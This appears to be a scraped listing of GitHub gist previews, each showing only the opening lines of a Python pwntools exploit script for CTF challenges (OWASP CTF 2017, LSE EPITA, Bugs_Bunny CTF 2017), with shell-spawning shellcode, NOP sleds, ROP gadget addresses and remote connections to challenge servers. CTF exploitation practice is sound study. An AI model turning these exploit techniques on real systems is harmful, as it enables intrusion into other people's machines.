This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from pwn import * | |
| jmp2heap = 0x804a008 | |
| SC = asm(shellcraft.sh()) | |
| def pwny(s,addr,shellcode): | |
| payload = "" | |
| payload += shellcode | |
| payload += "\x90"*35 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| #OWASPCTF 2017 | |
| #sandboxed exploit Code | |
| import itertools,string,hashlib | |
| import time,sys | |
| from pwn import * |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| from pwn import * | |
| #Author : Abdeljalil Nouiri | |
| # Xiorama CTF - PWN 200 Mint | |
| """ | |
| #LOCAL | |
| sysoff = 0x00040310 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| #Author : Abdeljalil Nouiri | |
| #exploit For LSE EPITA CTF : Tiny Panel 50 pts | |
| from pwn import * | |
| import sys | |
| username = "admin" |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| #Author : Abdeljalil Nouiri | |
| #exploit For LSE EPITA CTF : Smash Stack 100pts | |
| from pwn import * | |
| import sys | |
| cmd = 0x8049dc8 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| from pwn import * | |
| import time | |
| pop2ret = 0x8048b84 | |
| pop4ret = 0x8048eec | |
| sendGOT = 0x0804b064 | |
| sendPLT = 0x08048700 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| # 72: 0804857b 128 FUNC GLOBAL DEFAULT 13 print_flag | |
| from pwn import * | |
| import sys | |
| #con = process("./overflow") | |
| con = remote(sys.argv[1],sys.argv[2]) |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| from pwn import * | |
| from littlepwny import * | |
| #con = remote(sys.argv[1],int(sys.argv[2])) | |
| con = process("./START") | |
| shellcode = Scode("x64") | |
| readplt = 0x0000000000400400 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| #Bugs_Bunny CTF 2017 | |
| from pwn import * | |
| r = remote("54.153.19.139",5252) | |
| ret = 0x804b028 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| #Bugs_Bunny CTF 2017 | |
| from pwn import * | |
| #r = process("./pwn150") | |
| #raw_input() | |
| r =remote("54.153.19.139",5253) |